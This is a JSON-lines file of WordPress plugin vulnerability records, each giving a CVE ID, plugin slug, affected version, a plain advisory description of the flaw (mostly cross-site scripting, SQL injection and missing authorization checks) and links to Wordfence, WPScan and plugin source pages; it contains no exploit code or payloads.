{"CVE_ID":"CVE-2024-0620","slug":"password-protect-page","versionImpact":"1.8.9","description":"The PPWP \u2013 Password Protect Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.9 via API. This makes it possible for unauthenticated attackers to obtain post titles, IDs, slugs as well as other information including for password-protected posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41299927-2ed9-4cbe-b2b0-f306dc0e4a58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41299927-2ed9-4cbe-b2b0-f306dc0e4a58?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032733%40password-protect-page%2Ftrunk&old=3010000%40password-protect-page%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032733%40password-protect-page%2Ftrunk&old=3010000%40password-protect-page%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3611","slug":"toolbar-extras","versionImpact":"1.4.9","description":"The Toolbar Extras for Elementor & More \u2013 WordPress Admin Bar Enhanced plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tbex-version' shortcode in all versions up to, and including, 1.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50631f6c-de8b-408e-ab1f-ef74d3180e7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50631f6c-de8b-408e-ab1f-ef74d3180e7f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/toolbar-extras\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/toolbar-extras\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5662","slug":"ultimate-post-kit","versionImpact":"3.11.7","description":"The Ultimate Post Kit Addons For Elementor \u2013 (Post Grid, Post Carousel, Post Slider, Category List, Post Tabs, Timeline, Post Ticker, Tag Cloud) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter within the Social Count (Static) widget in all versions up to, and including, 3.11.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be9d977d-d7b2-4946-b107-35df176fbdf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be9d977d-d7b2-4946-b107-35df176fbdf3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post-kit\\\/tags\\\/3.11.5\\\/modules\\\/static-social-count\\\/widgets\\\/static-social-count.php#L800\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post-kit\\\/tags\\\/3.11.5\\\/modules\\\/static-social-count\\\/widgets\\\/static-social-count.php#L800\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106395\\\/#file526\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106395\\\/#file526\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-post-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-post-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6544","slug":"custom-post-limits","versionImpact":"4.4.1","description":"The Custom Post Limits plugin for WordPress is vulnerable to full path disclosure in all versions up to, and including, 4.4.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cf4a11e-ad28-4a93-9278-1d2d113a4859?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cf4a11e-ad28-4a93-9278-1d2d113a4859?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-post-limits\\\/trunk\\\/tests\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-post-limits\\\/trunk\\\/tests\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9520","slug":"userplus","versionImpact":"2.0","description":"The UserPlus plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 2.0. This makes it possible for authenticated attackers with subscriber-level permissions or above, to add, modify, or delete user meta and plugin options.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e64e41a1-ea8e-41b4-911c-672caf0d2df1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e64e41a1-ea8e-41b4-911c-672caf0d2df1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-ajax.php?rev=1627771#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-ajax.php?rev=1627771#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-ajax.php?rev=1627771#L225\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-ajax.php?rev=1627771#L225\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-ajax.php?rev=1627771#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-ajax.php?rev=1627771#L186\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10341","slug":"league-of-legends-shortcodes","versionImpact":"1.0.1","description":"The League of Legends Shortcodes plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 1.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22ddafad-9214-4d32-9fc3-3f3c759633ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22ddafad-9214-4d32-9fc3-3f3c759633ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/league-of-legends-shortcodes\\\/trunk\\\/lol-shortcodes.php?rev=934346#L101\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/league-of-legends-shortcodes\\\/trunk\\\/lol-shortcodes.php?rev=934346#L101\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10883","slug":"simpleform","versionImpact":"2.2.0","description":"The SimpleForm \u2013 Contact form made simple plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/045f2be3-9a24-4f8b-8a09-8adeb751b218?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/045f2be3-9a24-4f8b-8a09-8adeb751b218?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleform\\\/tags\\\/2.2.0\\\/admin\\\/includes\\\/class-simpleform-forms-list.php#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleform\\\/tags\\\/2.2.0\\\/admin\\\/includes\\\/class-simpleform-forms-list.php#L84\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7556","slug":"dts-simple-share","versionImpact":"0.5.3","description":"The Simple Share WordPress plugin through 0.5.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89ccbe24-be15-4b13-883a-48d6da9c8ffa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89ccbe24-be15-4b13-883a-48d6da9c8ffa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4936","slug":"wc-multivendor-marketplace","versionImpact":"3.4.11","description":"The WCFM Marketplace plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4.11 due to missing nonce checks on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of actions such as modifying shipping method details, modifying products, deleting arbitrary posts, and more, via a forged request granted they can trick a site's administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632635%40wc-multivendor-marketplace&new=2632635%40wc-multivendor-marketplace&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632635%40wc-multivendor-marketplace&new=2632635%40wc-multivendor-marketplace&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c2cc9a3-cd20-4c9e-baa4-1aea69f84331?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c2cc9a3-cd20-4c9e-baa4-1aea69f84331?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2404","slug":"crm-customer-relationship-management-by-vcita","versionImpact":"2.6.2","description":"The CRM and Lead Management by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 2.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-callback.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-callback.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e26ccd06-22e0-4d91-a53a-df6ead8a8e3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e26ccd06-22e0-4d91-a53a-df6ead8a8e3b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4243","slug":"full-customer","versionImpact":"2.2.3","description":"The FULL - Customer plugin for WordPress is vulnerable to Arbitrary File Upload via the \/install-plugin REST route in versions up to, and including, 2.2.3 due to improper authorization. This allows authenticated attackers with subscriber-level permissions and above to execute code by installing plugins from arbitrary remote locations including non-repository sources onto the site, granted they are packaged as a valid WordPress plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9799df3f-e34e-42a7-8a72-fa57682f7014?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9799df3f-e34e-42a7-8a72-fa57682f7014?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/1.1.0\\\/app\\\/api\\\/Plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/1.1.0\\\/app\\\/api\\\/Plugin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/2.2.1\\\/app\\\/api\\\/PluginInstallation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/2.2.1\\\/app\\\/api\\\/PluginInstallation.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6798","slug":"feedzy-rss-feeds","versionImpact":"4.3.2","description":"The RSS Aggregator by Feedzy \u2013 Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check when updating settings in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with author-level access or above to change the plugin's settings including proxy settings, which are also exposed to authors.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2cdf4e5-0a40-42ca-b5ac-78511fdd2b77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2cdf4e5-0a40-42ca-b5ac-78511fdd2b77?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012392%40feedzy-rss-feeds%2Ftrunk&old=2991547%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012392%40feedzy-rss-feeds%2Ftrunk&old=2991547%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0616","slug":"content-protector","versionImpact":"4.2.6.2","description":"The Passster \u2013 Password Protect Pages and Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.6.2 via API. This makes it possible for unauthenticated attackers to obtain post titles, slugs, IDs, content and other metadata including passwords of password-protected posts and pages.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00b81467-8d00-4816-895a-89d67c541c17?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00b81467-8d00-4816-895a-89d67c541c17?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032195%40content-protector%2Ftrunk&old=3020439%40content-protector%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032195%40content-protector%2Ftrunk&old=3020439%40content-protector%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3066","slug":"elegant-addons-for-elementor","versionImpact":"1.0.8","description":"The Elegant Addons for elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping on user supplied tag attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/affa8b39-94b8-474d-9310-a93ebdb7c1b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/affa8b39-94b8-474d-9310-a93ebdb7c1b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elegant-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elegant-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5424","slug":"simply-gallery-block","versionImpact":"3.2.1","description":"The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018galleryID\u2019 and 'className' parameters in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e7bd708-2e82-4fef-85f2-bf4f56f66bc4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e7bd708-2e82-4fef-85f2-bf4f56f66bc4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107152\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107152\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simply-gallery-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simply-gallery-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1604","slug":"shorten-url","versionImpact":"1.6.8","description":"The Short URL plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.8. This is due to missing or incorrect nonce validation on the configuration_page function. This makes it possible for unauthenticated attackers to add and import redirects, including comments containing cross-site scripting as detailed in CVE-2023-1602, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b926243c-ed12-4afe-ac72-932d4d871019?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b926243c-ed12-4afe-ac72-932d4d871019?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shorten-url\\\/trunk\\\/shorten-url.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shorten-url\\\/trunk\\\/shorten-url.php#L322\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9074","slug":"advanced-blocks-pro","versionImpact":"1.0.0","description":"The Advanced Blocks Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f419d14a-90d1-445a-b629-c2e978c3ab81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f419d14a-90d1-445a-b629-c2e978c3ab81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-blocks-pro\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-blocks-pro\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10150","slug":"bamazoo-button-generator","versionImpact":"1.0","description":"The Bamazoo \u2013 Button Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's dgs shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/543507a1-02de-417f-a742-7764465987b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/543507a1-02de-417f-a742-7764465987b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bamazoo-button-generator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bamazoo-button-generator\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10875","slug":"fancy-gallery","versionImpact":"1.6.58","description":"The Gallery Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_Query_Arg without appropriate escaping on the URL in all versions up to, and including, 1.6.58. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ff56cf-0b64-491f-8629-8b7738adee10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ff56cf-0b64-491f-8629-8b7738adee10?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fancy-gallery\\\/trunk\\\/options-page\\\/options-page.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fancy-gallery\\\/trunk\\\/options-page\\\/options-page.php#L25\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11095","slug":"visualmodo-elements","versionImpact":"1.0.2","description":"The Visualmodo Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/visualmodo-elements\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/visualmodo-elements\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49005688-fa40-458d-9c96-5ec2ca7adcd3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49005688-fa40-458d-9c96-5ec2ca7adcd3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11382","slug":"common-ninja","versionImpact":"1.1.0","description":"The Common Ninja: Fully Customizable & Perfectly Responsive Free Widgets for WordPress Websites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'commonninja' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/common-ninja\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/common-ninja\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1205432-4de0-4745-b8d5-e36aa8f3da49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1205432-4de0-4745-b8d5-e36aa8f3da49?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13099","slug":"widget4call","versionImpact":"1.0.7","description":"The Widget4Call WordPress plugin through 1.0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0cabf5c-7b01-4163-834b-a134db3a90b4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0cabf5c-7b01-4163-834b-a134db3a90b4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1768","slug":"squirrly-seo","versionImpact":"12.4.05","description":"The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to blind SQL Injection via the 'search' parameter in all versions up to, and including, 12.4.05 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the 